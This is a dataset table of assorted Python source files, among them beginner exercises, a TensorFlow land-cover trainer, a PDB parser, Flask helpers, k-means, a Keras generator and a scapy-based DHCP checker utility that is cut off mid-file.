blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
4b2bb4912f6bec7f2eada013ce9cd897a797e2b9 | Python | PrashantThakurNitP/python-december-code | /assignment 2.8 print in dictionary order.py | UTF-8 | 657 | 3.96875 | 4 | [] | no_license | x=input("input first string :")
y=input("enter second string : ")
z=input("enter third string : ")
if x>=y:
if y>=z:
print("the string in dictionary order are")
print(z,y,x,sep="\n")
elif z>x:
print("the string in dictionary order are")
print(y,x,z,sep="\n")
else:
print("the string in dictionary order are")
print(y,z,x,sep="\n")
else :
if z>=y:
print("the string in dictionary order are")
print(x,y,z,sep="\n")
elif x>=z:
print("the string in dictionary order are")
print(z,x,y,sep="\n")
else:
print("the string in dictionary order are")
print(x,z,y,sep="\n")
| true |
09c314502edde5591d88f1de8c98d15463c0ae21 | Python | mvpzone/python-docs-samples | /people-and-planet-ai/land-cover-classification/trainer.py | UTF-8 | 7,350 | 2.75 | 3 | [
"Apache-2.0"
] | permissive | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This trains a TensorFlow model to classify land cover.
The model is a simple Fully Convolutional Network (FCN) using the
TensorFlow Keras high-level API.
"""
import os
from typing import Dict, Tuple
import tensorflow as tf
# Define the input and output names for the model.
INPUT_BANDS = [
"B1",
"B2",
"B3",
"B4",
"B5",
"B6",
"B7",
"B8",
"B8A",
"B9",
"B10",
"B11",
"B12",
]
OUTPUT_BANDS = ["landcover"]
# Number of land cover classifications.
NUM_CLASSIFICATIONS = 9
def preprocess(values: Dict[str, tf.Tensor]) -> Tuple[Dict[str, tf.Tensor], tf.Tensor]:
"""Splits inputs and outputs into a tuple and converts them into a
machine learning friendly format.
Args:
values: Dictionary of 2D tensors, each corrseponding to one band.
Returns: A tuple of (inputs, outputs).
"""
# Create a dictionary of band values.
inputs = {name: values[name] for name in INPUT_BANDS}
# Convert the labels into one-hot encoded vectors.
outputs = tf.one_hot(tf.cast(values["landcover"], tf.uint8), NUM_CLASSIFICATIONS)
return (inputs, outputs)
def read_dataset(
file_pattern: str, patch_size: int, batch_size: int
) -> tf.data.Dataset:
"""Reads a compressed TFRecord dataset and preprocesses it into a machine
learning friendly format.
Args:
file_pattern: Local or Cloud Storage file pattern of the TFRecord files.
patch_size: Patch size of each example.
batch_size: Number of examples to batch together.
Returns: A tf.data.Dataset ready to feed to the model.
"""
# Create the features dictionary, we need this to parse the TFRecords.
input_shape = (patch_size, patch_size)
features_dict = {
band_name: tf.io.FixedLenFeature(input_shape, tf.float32)
for band_name in INPUT_BANDS + OUTPUT_BANDS
}
return (
# We list and interleave each TFRecord file to process each file in parallel.
tf.data.Dataset.list_files(file_pattern)
.interleave(
lambda filename: tf.data.TFRecordDataset(filename, compression_type="GZIP"),
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False,
)
# We batch before parsing and preprocessing so it can be vectorized.
.batch(batch_size)
.map(
lambda batch: tf.io.parse_example(batch, features_dict),
num_parallel_calls=tf.data.AUTOTUNE,
)
.map(preprocess, num_parallel_calls=tf.data.AUTOTUNE)
# Finally we cache the current batch and prefetch the next one.
.cache()
.prefetch(tf.data.AUTOTUNE)
# For more information on how to optimize your tf.data.Dataset, see:
# https://www.tensorflow.org/guide/data_performance
)
def new_model(training_dataset: tf.data.Dataset) -> tf.keras.Model:
"""Creates a new Fully Convolutional Network (FCN) model.
Args:
training_dataset: The dataset to use for the normalization layer.
Returns: A Fully Convolutional Network model.
"""
# Adapt the Normalization layer with the training dataset.
normalization = tf.keras.layers.Normalization()
normalization.adapt(
training_dataset.map(
lambda inputs, _: tf.stack([inputs[name] for name in INPUT_BANDS], axis=-1)
)
)
# Define the Fully Convolutional Network.
layers = [
tf.keras.Input(shape=(None, None, len(INPUT_BANDS))),
normalization,
tf.keras.layers.Conv2D(filters=32, kernel_size=5, activation="relu"),
tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=5, activation="relu"),
tf.keras.layers.Dense(NUM_CLASSIFICATIONS, activation="softmax"),
]
fcn_model = tf.keras.Sequential(layers, name="FullyConvolutionalNetwork")
# Define the input dictionary layers.
input_layers = {
name: tf.keras.Input(shape=(None, None, 1), name=name) for name in INPUT_BANDS
}
# Model wrapper that takes an input dictionary and feeds it to the FCN.
inputs = tf.keras.layers.concatenate(input_layers.values())
model = tf.keras.Model(input_layers, fcn_model(inputs))
model.compile(
optimizer="adam",
loss="categorical_crossentropy",
metrics=[
tf.keras.metrics.OneHotIoU(
num_classes=NUM_CLASSIFICATIONS,
target_class_ids=list(range(NUM_CLASSIFICATIONS)),
)
],
)
return model
def run(
training_data: str,
validation_data: str,
model_path: str,
patch_size: int,
epochs: int,
batch_size: int = 256,
) -> None:
"""Creates, trains and saves a new model.
Args:
training_data: File pattern for the training data files.
validation_data: File pattern for the validation data files.
model_path: Path to save the model to.
patch_size: Patch size of the training and validation datasets.
epochs: Number of times to go through the training dataset.
batch_size: Number of examples for the model to look at the same time.
"""
# Read the training and validation datasets.
training_dataset = read_dataset(training_data, patch_size, batch_size)
validation_dataset = read_dataset(validation_data, patch_size, batch_size)
# Create, train and save the model.
model = new_model(training_dataset)
model.fit(
training_dataset,
validation_data=validation_dataset,
epochs=epochs,
)
model.save(model_path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--training-data",
default="datasets/training*.tfrecord.gz",
help="Local or Cloud Storage file pattern for the training data files.",
)
parser.add_argument(
"--validation-data",
default="datasets/validation*.tfrecord.gz",
help="Local or Cloud Storage file pattern for the validation data files.",
)
parser.add_argument(
"--model-path",
default=os.environ.get("AIP_MODEL_DIR", "model"),
help="Local or Cloud Storage path to save the model to.",
)
parser.add_argument(
"--patch-size",
default=16,
type=int,
help="Patch size of the training and validation datasets.",
)
parser.add_argument(
"--epochs",
default=50,
type=int,
help="Number of times to go through the training dataset.",
)
parser.add_argument(
"--batch-size",
default=256,
type=int,
help="Number of examples for the model to look at the same time.",
)
args = parser.parse_args()
run(**vars(args))
| true |
a37d3e3fa59b0a1eab1f1052052a7955450745b9 | Python | JLuebben/pdb2blend | /readpdb.py | UTF-8 | 4,897 | 2.953125 | 3 | [] | no_license | from collections import OrderedDict
class DuplicateAtomError(Exception):
pass
class PdbObject(object):
def __init__(self, fileName):
self._fileName = fileName
self._atomsByEntry = OrderedDict()
self._residues = OrderedDict()
self._residuesByClass = {}
def read(self):
with open(self._fileName, 'r') as fp:
for line in fp.readlines():
if not line.startswith('ATOM'):
continue
# print(str(''.join([str(x)[-1] for x in range(100)])))
# print(line)
atomId = int(line[7:11])
atomName = line[13:16].strip()
residueName = line[17:20].strip()
chain = line[21].strip()
residue = int(line[23:26])
element = line[76:78].strip()
position = [float(w) for w in line[31:54].strip().split() if w]
# print(atomId, atomName, residueName, chain, residue, element, position)
atom = Atom(atomId, atomName, residueName, position, residue, chain, element)
# print(atom)
self.addAtom(atom)
def addAtom(self, atom):
if atom.id in self._atomsByEntry:
raise DuplicateAtomError
self._atomsByEntry[atom.id] = atom
residueNumber = atom.residue
if not residueNumber in self._residues:
resi = Residue(residueNumber, atom.residueName)
self._residues[residueNumber] = resi
else:
resi = self._residues[residueNumber]
resi.addAtom(atom)
if not atom.residueName in self._residuesByClass:
self._residuesByClass[atom.residueName] = []
self._residuesByClass[atom.residueName].append(resi)
def center(self):
X, Y, Z = [],[],[]
for atom in self._atomsByEntry.values():
x, y, z = atom.position
X.append(x)
Y.append(y)
Z.append(z)
x = sum(X)/len(X)
y = sum(Y)/len(Y)
z = sum(Z)/len(Z)
offset = (x,y,z)
for atom in self._atomsByEntry.values():
atom.translate(offset)
def __getitem__(self, item):
return self._residues[item]
def __iter__(self):
for residue in self._residues.values():
yield residue
def iterBackBone(self, triples=False):
for residue in self:
if triples:
yield [pos for pos in residue.iterBackBone()]
else:
for pos in residue.iterBackBone():
yield pos
class Residue(object):
def __init__(self, number, cls):
self._number = number
self._class = cls
self._atoms = OrderedDict()
def addAtom(self, atom):
self._atoms[atom.name] = atom
def __iter__(self):
for atom in self._atoms.values():
yield atom
@property
def position(self):
return self._atoms['C'].position
def iterBackBone(self):
yield self._atoms['N'].position
yield self._atoms['CA'].position
yield self._atoms['C'].position
def iterBonds(self):
blackList = set()
for atom1 in self._atoms.values():
for atom2 in self._atoms.values():
if atom1 is atom2:
continue
key = tuple(sorted([atom1.name, atom2.name]))
if key in blackList:
continue
if self._dist(atom1.position, atom2.position) < 1.7:
yield atom1, atom2
blackList.add(key)
def _dist(self, pos1, pos2):
return sum([(p1 - p2)**2 for p1, p2 in zip(pos1, pos2)])**.5
class Atom(object):
def __init__(self, atomId, atomName, residueName, position, residue, chain='A', element='C', ):
self.id = atomId
self.name = atomName
self.residueName = residueName
self.position = position
self.residue = residue
self.chain = chain
self.element = element
def __str__(self):
return 'ATOM {:3} in residue {:3} at {}'.format(self.name,
self.residueName,
str(self.position))
def translate(self, offset):
self.position = [x-y for x, y in zip(self.position, offset)]
if __name__ == '__main__':
pdb = PdbObject('C:/Users/arrah/Desktop/OverLayCln5Se-PPPDE1/x.pdb')
pdb.read()
for atom in pdb[101]:
print(atom)
print(atom.position)
# for resi in pdb:
# print(resi.position)
# print()
# for pos in pdb.iterBackBone(triples=True):
# print(pos)
# pdb.center()
# for pos in pdb.iterBackBone(triples=True):
# print(pos)
for bond in pdb[101].iterBonds():
print(bond) | true |
c740a29bee23a34edacb2cba7bb182903f2c2e14 | Python | Aasthaengg/IBMdataset | /Python_codes/p03496/s925946878.py | UTF-8 | 371 | 3.25 | 3 | [] | no_license | I = int(input())
L = list(map(int, input().split()))
print(2*I-1, flush=True)
m = 0
m_index = 0
for i, item in enumerate(L):
if abs(item) > abs(m):
m = item
m_index = i
for i in range(I):
print(m_index+1, i+1, flush=True)
if m >= 0:
for i in range(0, I-1):
print(i+1, i+2)
else:
for i in range(I, 1, -1):
print(i, i-1)
| true |
f092f3b1f4a5eb4c0ef087a8010212550dcf5af6 | Python | russlarge256/wsgi-calculator | /calculator.py | UTF-8 | 3,630 | 3.5625 | 4 | [] | no_license | import traceback
def home():
""" Sets up home page """
page = """
<h1> Web Calculator </h1>
<p>In order to use this website effectively, use the url to
specify operation type (add, subtract, multiply, divide) and the numbers
for the operation. Example: http://localhost:8080/add/2/3
"""
return page
def multiply(*args):
""" Returns a STRING with the multiplication of the arguments """
try:
one, two = args
mult = int(one) * int(two)
page = f"""
<h1>Multiplication Page</h1>
<h2>{mult}</h2>
"""
return page
except ValueError:
print("value error")
def divide(*args):
""" Returns a STRING with the division of the arguments """
try:
one, two = args
divide = int(one) / int(two)
page = f"""
<h1>Division Page</h1>
<h2>{divide}</h2>
"""
return page
except ValueError:
print("value error")
def subtract(*args):
""" Returns a STRING with the difference of the arguments """
try:
one, two = args
difference = int(one) - int(two)
page = f"""
<h1>Subtraction Page</h1>
<h2>{difference}</h2>
"""
return page
except ValueError:
print("value error")
def add(*args):
""" Returns a STRING with the sum of the arguments """
sum = 0
try:
for item in args:
print(item)
sum += int(item)
except ValueError:
print("value error")
finally:
page = f"""
<h1>Addition Page</h1>
<h2>{sum}</h2>
"""
return page
def resolve_path(path):
"""
Should return two values: a callable and an iterable of
arguments.
"""
# TODO: Provide correct values for func and args. The
# examples provide the correct *syntax*, but you should
# determine the actual values of func and args using the
# path.
funcs = {
'add': add,
'subtract': subtract,
'divide': divide,
'multiply': multiply,
'': home,
}
path = path.strip('/').split('/')
func_name = path[0]
numbers = path[1:]
try:
func = funcs[func_name]
except KeyError:
raise NameError
return func, numbers
def application(environ, start_response):
# TODO: Your application code from the book database
# work here as well! Remember that your application must
# invoke start_response(status, headers) and also return
# the body of the response in BYTE encoding.
#
# TODO (bonus): Add error handling for a user attempting
# to divide by zero.
headers = [('Content-type', 'text/html')]
try:
path = environ.get('PATH_INFO', None)
print(path)
func, args = resolve_path(path)
body = func(*args)
status = "200 OK"
except NameError:
status = "404 Not Found"
body = "<h1>Not Found</h1>"
except Exception:
status = "500 Not Found"
body = "<h1>Internal Server Error</h1>"
print(traceback.format_exc())
finally:
print(f"This is the body:{body}")
headers.append(('Content-length', str(len(body))))
start_response(status, headers)
return [body.encode('utf8')]
if __name__ == '__main__':
# TODO: Insert the same boilerplate wsgiref simple
# server creation that you used in the book database.
from wsgiref.simple_server import make_server
server = make_server('localhost', 8080, application)
server.serve_forever()
| true |
4885480138ca6271277587003c6ad095ef0ac7f1 | Python | avanger9/LP-laboratori | /python/practica/prova1.py | UTF-8 | 71 | 3.515625 | 4 | [] | no_license | a = [1,2,3,4,5]
b = [9,8,7]
for c, d in (a,b):
print(c), print(d)
| true |
b513a1963ce8c6dd11ba50eb69fdf709a10fd91f | Python | lutzer/sahabe | /de.sahabe.backend/main/app/response.py | UTF-8 | 2,029 | 2.515625 | 3 | [] | no_license | '''
Created on Jul 13, 2014
@author: Maan Al Balkhi
'''
from flask import Response
from flask import json
headers = {"Access-Control-Allow-Origin":"http://127.0.0.1:8000",
"Access-Control-Allow-Methods":"*",
"Access-Control-Allow-Credentials":"true",
"Access-Control-Allow-Headers":"X-Requested-With"}
def send400(message="operation failed", mimetype='application/json'):
js = json.dumps({"message":message})
resp = Response(js, status=400, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def send401(message="unauthorized", mimetype='application/json'):
js = json.dumps({"message":message})
resp = Response(js, status=401, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def response200():
resp = Response(status=200)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def send200(message="operation was successful", mimetype='application/json'):
js = json.dumps({"message":message})
resp = Response(js, status=200, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def send204(message="operation was not successful", mimetype='application/json'):
js = json.dumps({"message":message})
resp = Response(js, status=204, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def sendResponse(status=200, mimetype="text/html"):
resp = Response(status=status, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
def sendData(data, status=200, mimetype='application/json'):
js = json.dumps(data)
resp = Response(js, status=status, mimetype=mimetype)
for key, value in headers.iteritems():
resp.headers.add(key, value)
return resp
| true |
a1627eb146da2821a6b3fc5d630ab3724b508fe3 | Python | TTKSilence/Educative | /GrokkingTheCodeInterview-PatternsForCodingQuestions/1.PatternSlidingWindow/5.FruitsIntoBaskets(med).py | UTF-8 | 570 | 3.3125 | 3 | [] | no_license | def solution(Fruit):
left=0
basket={}
count=0
maxlength=0
for i,x in enumerate(Fruit):
if x in basket:
basket[x]+=1
else:
basket[x]=1
count+=1
while count>2:
basket[Fruit[left]]-=1
if basket[Fruit[left]]==0:
del basket[Fruit[left]]
count-=1
left+=1
maxlength=max(maxlength,i-left+1)
return maxlength
def main():
print(solution(['A','B','C','A','C']))
print(solution(['A','B','C','B','B','C']))
main() | true |
6beca6e93062b6f4d8cd05282e6a68169a5b260a | Python | Kawser-nerd/CLCDSA | /Source Codes/AtCoder/arc088/B/3620240.py | UTF-8 | 283 | 3.359375 | 3 | [] | no_license | def main():
buf = input()
S = buf
K = len(S) // 2
center_char = S[K]
while K < len(S):
if S[K] == center_char and S[-K - 1] == center_char:
K += 1
else:
break
print(K)
if __name__ == '__main__':
main() | true |
b3b5ca2a033a6c4011c90c3f748500106521b77f | Python | calebsimmons/hungry_monsters | /tiny_monsters/psc_parser.py | UTF-8 | 5,417 | 3.171875 | 3 | [] | no_license | """
This module implements a parser for PySCeS Model Description
Language files, according to the spec provided [LINK GOES HERE].
Input: A .psc filename Output: A list containing reactions and a
dictionary of initial values.
A reaction is a list of the form:
[[reactants],[products],rate]
A initial value dictionary is a dict of the form:
{'species_name':copy_number}
Example output:
[[['P_protein',' Z_basal_promoter' ,'Z_basal_promoter'],
['Z_repressed_promoter '], 0.281893898709],
[['Z_repressed_promoter'],['P_protein','Z_basal_promoter '],1],
[[],['S'],10],
{'X':1}]
"""
import string,re
class Parser(object):
"""Parser class for PSC files"""
def __init__(self,filename):
"""Initialize a Parser from a PSC filename"""
with open(filename) as f:
self.lines = [line.strip() for line in f.readlines()]
self.reactions = []
self.init_vals = {}
def parse_lines_into_sentences(self):
"""Accept a list of lines and return a list of 'sentences'. A
sentence is a list of lines which describe a single complete
assertion about the model: i.e. an individual reaction or
initial value declarations. """
sentences = []
current_reaction = []
for line in self.lines:
if self.sees_comment(line) or self.sees_blank_line(line):
continue #checking for comments needs to happen first.
elif "=" in line:
sentences.append([line])
elif self.sees_reaction_name(line):
continue
elif self.sees_reaction_equation(line):
current_reaction.append(line)
elif self.sees_reaction_rate(line):
current_reaction.append(line)
sentences.append(current_reaction)
current_reaction = [] # clear the current reaction
# since we've reached the last line
return sentences
def parse(self):
sentences = self.parse_lines_into_sentences()
for sentence in sentences:
self.parse_sentence(sentence) #side effects
return (self.reactions,self.init_vals)
def parse_sentence(self,sentence):
if len(sentence) == 1: #if an initial value
return self.parse_init_val(sentence)
elif len(sentence) == 2:
return self.parse_reaction(sentence)
else:
raise Exception("Sentence could not be parsed:",sentence)
def parse_init_val(self,sentence):
line = sentence[0]
symbol,value = line.split('=')
self.init_vals[symbol.strip()] = float(value)
def parse_reaction(self,sentence):
print sentence
equation,rate = sentence
lhs,rhs = equation.split('>')
reactants,products = map(self.parse_half_equation,[lhs,rhs])
raw_rate_components = [comp.strip() for comp in rate.split("*")]
# the Gillespie engine will take care of adjusting the
# effective rate by the reactant copy numbers, so strip those out.
rate_components = filter(self.sees_numeric,raw_rate_components)
rate = reduce(lambda x,y:x*y,rate_components,1)
self.reactions.append([reactants,products,rate])
def parse_half_equation(self,half_equation):
"""Take a lhs or rhs and return a list of components"""
raw_species = [species.strip() for species in half_equation.split('+')
if not "$pool" in species] # ignore $pool
species = self.rectify_coefficients(raw_species)
return species
def rectify_coefficients(self,stoich_vector):
"""Accept a half-reaction vector of the form ['R1','{2}
R2}',...] and convert it to a half-reaction vector of the
form ['R1','R2','R2',...]"""
if stoich_vector == []:
return []
else:
first_species,rest_species = stoich_vector[0],stoich_vector[1:]
if "{" in first_species:
regexp = """\{ #an openstache
([0-9]+) #any number of digits, which we capture
\} #a closestache
\s #whitespace
([A-Za-z]+) #species name, which we capture"""
coeff,species = re.search(regexp,
first_species,
re.VERBOSE).groups()
effective_species = [species] * int(coeff)
return effective_species + self.rectify_coefficients(rest_species)
else:
return [first_species] + self.rectify_coefficients(rest_species)
def sees_blank_line(self,line):
return all(char in string.whitespace for char in line)
def sees_comment(self,line):
return line.startswith('#')
def sees_reaction_name(self,line):
return line.endswith(':')
def sees_reaction_equation(self,line):
return ">" in line
def sees_reaction_rate(self,line):
return "*" in line or not ">" in line # reaction rate could be
# a single symbol
def sees_numeric(self,text):
return re.match("^[0-9.]+$",text)
def sees_symbol(self,text):
return re.match("^[A-Za-z]+$",text)
print "loaded parser"
| true |
d56d9b5a0018e44ef5f77bf1a2a3af295d6f8f64 | Python | PabloPedace/Python-Curso-Youtube | /metodosdecadenas.py | UTF-8 | 2,394 | 4.625 | 5 | [] | no_license | #Metodos de cadenas
#Uso de metodos de cadenas: string
myStr = "hello world"
print("HELLO WORLD AND " + myStr) #Concatenacion
print(f"HELLO WORLD AND {myStr}") #Concatenacion con f
print("HELLO WORLD AND {0}".format(myStr)) #Concatenacion
#print(dir(myStr))
# print(myStr.upper()) #Convierte todo en mayuscula
# print(myStr.lower()) #Convierte todo en minuscula
# print(myStr.swapcase()) #Cambia de mayusucla a minuscula y viceversa
# print(myStr.capitalize()) #Convierte la primera letra del texto en mayuscula
# print(myStr.replace("hello", "bye")) #Remplaza la palabras o letras que queres
# print(myStr.replace("hello", "bye").upper())
# print(myStr.count("l")) #Muestra cuntas veces se repite la letra
# print(myStr.startswith("hola")) #Muestra si la palabra que empieza el texto es verdadera o falsa
# print(myStr.startswith("hello")) #Muestra si la palabra que empieza el texto es verdadera o falsa
# print(myStr.startswith("he")) #Muestra si la palabra que empieza el texto es verdadera o falsa
# print(myStr.endswith("world")) #Muestra si la palabra que termina el texto es verdadera o falsa
# print(myStr.split()) #Separa los caracteres "Separa las palabras utilizando espacios"
# print(myStr.strip()) #Borra los espacios sobrantes al principio y al final
# print(myStr.split("o")) #Separa los caracteres "Separa las palabras utilizando espacios"
# print(myStr.find("o")) #Busca en que posicion estan los caracteres
# print(myStr.rfind()) #Representa el indice de un caracter, pero lo hace contando desde atras
# print(len(myStr)) #Muestra la longitud
# print(myStr.find("e"))
# print(myStr.index("e"))
# print(myStr.isdigit()) #Devuelve un booleano
# print(myStr.isnumeric()) #Muestra si es numerico
# print(myStr.isalpha()) #Muestra si es numerico
# print(myStr.isalum()) #Comprueba si son alphanumericos
print(myStr[4]) #Muestra en que posicion esta la letra
print(myStr[-5]) #Muestra en que posicion esta la letra inversamente
nombreUsuario=input("Introduce tu nombre de Usuario: ")
print("El nombre es: ", nombreUsuario.upper())
print("El nombre es: ", nombreUsuario.lower())
print("El nombre es: ", nombreUsuario.capitalize())
edad=input("Introduce la edad: ")
while(edad.isdigit()==False):
print("Por favor, introduce un valor numerico")
edad=input("Introduce la edad: ")
if (int(edad)<18):
print("No puede pasar")
else:
print("Puedes pasar") | true |
7b2507ded388ce9e7e21b055a295f650d83e4616 | Python | Aasthaengg/IBMdataset | /Python_codes/p02717/s631808751.py | UTF-8 | 55 | 2.703125 | 3 | [] | no_license | A,B,C = (int(x) for x in input().split())
print(C,A,B)
| true |
de600dcb250ad6782464edc36bdb05fbb49d51da | Python | YellowKyu/ml-interview-review | /kmeans.py | UTF-8 | 1,648 | 3.203125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
# generate 2d classification dataset
X, Y = make_blobs(n_samples=1000, n_features=10, centers=5)
# visualization
#plt.scatter(X[:, 0], X[:, 1], marker='o', c=Y, s=25, edgecolor='k')
#plt.show()
# splitting data
x, x_val, y, y_val = train_test_split(X, Y, test_size=0.2)
# init params
k = 5
rand_index = np.random.choice(x.shape[0], k)
centroids = x[rand_index]
iteration = 0
while True:
# compute dist between centroids and sample data
diff = (x[:, np.newaxis] - centroids)
dist = np.linalg.norm(diff, ord=2, axis=(2))
dist_min = np.argmin(dist, axis=1)
# update centroids
updated = False
for c in range(k):
# gather all sample assigned to a category c
index_all_c = np.where(dist_min == c)
all_c = x[index_all_c]
# computer mean of gathered samples and update centroids
mean_all_c = all_c.mean(axis=0)
if np.array_equal(mean_all_c, centroids[c]) is False:
updated = True
centroids[c] = mean_all_c
iteration += 1
print(iteration)
if updated == False:
break
diff = (x[:, np.newaxis] - centroids)
dist = np.linalg.norm(diff, ord=2, axis=(2))
y_pred = np.argmin(dist, axis=1)
# visualize real cagetory vs clusters found by k-means over 2 features
fig, axs = plt.subplots(2)
axs[0].scatter(x[:, 0], x[:, 1], marker='o', c=y, s=25, edgecolor='k')
axs[1].scatter(x[:, 0], x[:, 1], marker='o', c=y_pred, s=25, edgecolor='k')
plt.show()
| true |
222ee35a778a385dbfeef3d30e62c30120ede78e | Python | bardiabarabadi/SingleImage_x264 | /Experiments/Exp_1/pythons/Network.py | UTF-8 | 4,412 | 2.59375 | 3 | [] | no_license | # Modules
from keras.layers.core import Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import UpSampling2D
from keras.layers import Input, Concatenate, merge, Add
from keras.layers.convolutional import Conv2D
from keras.models import Model
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers import add
# Residual block
def res_block_gen(model, kernel_size, filters, strides):
gen = model
model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
model = BatchNormalization(momentum=0.5)(model)
# Using Parametric ReLU
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(model)
model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
model = BatchNormalization(momentum=0.5)(model)
model = add([gen, model])
return model
def up_sampling_block(model, kernel_size, filters, strides):
# In place of Conv2D and UpSampling2D we can also use Conv2DTranspose (Both are used for Deconvolution)
# Even we can have our own function for deconvolution (i.e one made in Utils.py)
# model = Conv2DTranspose(filters = filters, kernel_size = kernal_size, strides = strides, padding = "same")(model)
model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
model = UpSampling2D(size=2)(model)
model = LeakyReLU(alpha=0.2)(model)
return model
def down_sampling_block(model, kernel_size, filters, strides):
# In place of Conv2D and UpSampling2D we can also use Conv2DTranspose (Both are used for Deconvolution)
# Even we can have our own function for deconvolution (i.e one made in Utils.py)
# model = Conv2DTranspose(filters = filters, kernel_size = kernel_size, strides = strides, padding = "same")(model)
model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
model = LeakyReLU(alpha=0.2)(model)
return model
def discriminator_block(model, filters, kernel_size, strides):
model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
model = BatchNormalization(momentum=0.5)(model)
model = LeakyReLU(alpha=0.2)(model)
return model
class Generator(object):
def __init__(self, noise_shape):
self.noise_shape = noise_shape
def generator(self):
gen_input = Input(shape=self.noise_shape)
model = Conv2D(filters=16, kernel_size=5, strides=1, padding="same")(gen_input)
model1 = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model = Conv2D(filters=16, kernel_size=5, strides=1, padding="same")(model1)
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model2 = Add()([model1, model])
model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model2)
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model3 = Add()([model2, model])
model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model3)
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model4 = Add()([model3, model])
model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model4)
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model5 = Add()([model4, model])
model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model5)
model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
model)
model = Add()([model5, model])
model = Conv2D(filters=3, kernel_size=3, strides=1, padding="same")(model)
model = Add()([model, gen_input]);
model = Activation('tanh')(model)
generator_model = Model(inputs=gen_input, outputs=model)
return generator_model
| true |
d00be95c7be01ced03437647da68c23173742954 | Python | loles/fuelweb | /dhcp-checker/dhcp_checker/utils.py | UTF-8 | 4,593 | 2.734375 | 3 | [] | no_license | # Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from scapy.all import *
import subprocess
import functools
import re
def command_util(*command):
"""object with stderr and stdout
"""
return subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def _check_vconfig():
"""Check vconfig installed or not
"""
return not command_util('which', 'vconfig').stderr.read()
def check_network_up(iface):
state = command_util('ip', 'link', 'show', iface)
response = re.search(r'state (?P<state>[A-Z]*)', state.stdout.read())
return response.groupdict()['state'] == 'UP'
def check_iface_exist(iface):
"""Check provided interface exists
"""
return not command_util("ip","link", "show", iface).stderr.read()
def filtered_ifaces(ifaces):
for iface in ifaces:
if not check_iface_exist(iface):
sys.stderr.write('Iface {0} does not exist.'.format(iface))
else:
if not check_network_up(iface):
sys.stderr.write('Network for iface {0} is down.'.format(iface))
else:
yield iface
def pick_ip(range_start, range_end):
"""Given start_range, end_range generate list of ips
>>> next(pick_ip('192.168.1.10','192.168.1.13'))
'192.168.1.10'
"""
split_address = lambda ip_address: \
[int(item) for item in ip_address.split('.')]
range_start = split_address(range_start)
range_end = split_address(range_end)
i = 0
# ipv4 subnet cant be longer that 4 items
while i < 4:
# 255 - end of subnet
if not range_start[i] == range_end[i] and range_start[i] < 255:
yield '.'.join([str(item) for item in range_start])
range_start[i] += 1
else:
i += 1
def format_options(options):
"""Util for serializing dhcp options
@options = [1,2,3]
>>> format_options([1, 2, 3])
'\x01\x02\x03'
"""
return "".join((chr(item) for item in options))
def _dhcp_options(dhcp_options):
"""Dhcp options returned by scapy is not in usable format
[('message-type', 2), ('server_id', '192.168.0.5'),
('name_server', '192.168.0.1', '192.168.0.2'), 'end']
"""
for option in dhcp_options:
if isinstance(option, (tuple, list)):
header = option[0]
if len(option[1:]) > 1:
yield (header, option)
else:
yield (header, option[1])
def single_format(func):
"""Manage format of dhcp response
"""
